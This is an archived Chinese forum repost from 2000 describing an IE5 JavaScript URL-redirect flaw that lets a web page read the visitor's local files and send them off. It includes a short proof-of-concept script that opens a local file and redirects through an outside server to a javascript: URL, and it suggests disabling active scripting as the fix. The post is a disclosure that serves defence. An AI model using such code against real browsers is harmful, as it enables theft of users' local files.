精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◆系统漏洞◆>>JAVASCRIPT URL重定向漏洞 [转载]

主题:JAVASCRIPT URL重定向漏洞 [转载]
发信人: programgirl()
整理人: williamlong(2000-09-20 08:45:58), 站内信件
发信人: liukang (雨), 信区: security 
标  题: JAVASCRIPT URL重定向漏洞 
发信站: 知新园 (Mon Jun 19 18:57:58 2000) 

发信人: superoscar (四大皆空), 信区: Hacker 
标  题: Javascript的url重定向漏洞 
发信站: 华南网木棉站 (Fri Jun 16 23:01:02 2000), 转信 
 IE5.0存在JAVASCRIPT URL重定向漏洞 
漏洞说明: 
可以设计一个带有URL重定向漏洞的页面,当IE5用户访问时,可以 
读受害人主机的本地文件(或者读用户登录所在网络的任何文件),并通过INTERN
ET把内 

容发送的所指定的某个地点。 
在通常情况下,JAVASCRIPT接受到非本地"安全区域"是不允许执行阅读本地主机
的行为 

。在这种情况下,IE5是通过HTTP重定向到JAVASCRIPT所欺骗,以至浏览器认为此
JAVAS 

CRIPT执行在本地主机安全区域下。 
漏洞代码: 
<SCRIPT> 
alert("Create a short text file C:\\TEST.TXT and it will be read and s
hown i 

n a dialog box"); 
a=window.open("file://c:/test.txt"); 
a.location="http://www.superoscar.com/reject.cgi?jsredir1"; 
</SCRIPT> 
//        ^ 此句是做了个HTTP重定向 "javascript:alert(document.body.inn
erText 
)"。 
解决办法: 
关掉ACTIVE SCRIPT。 



--
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 152.163.194.181]

[关闭][返回]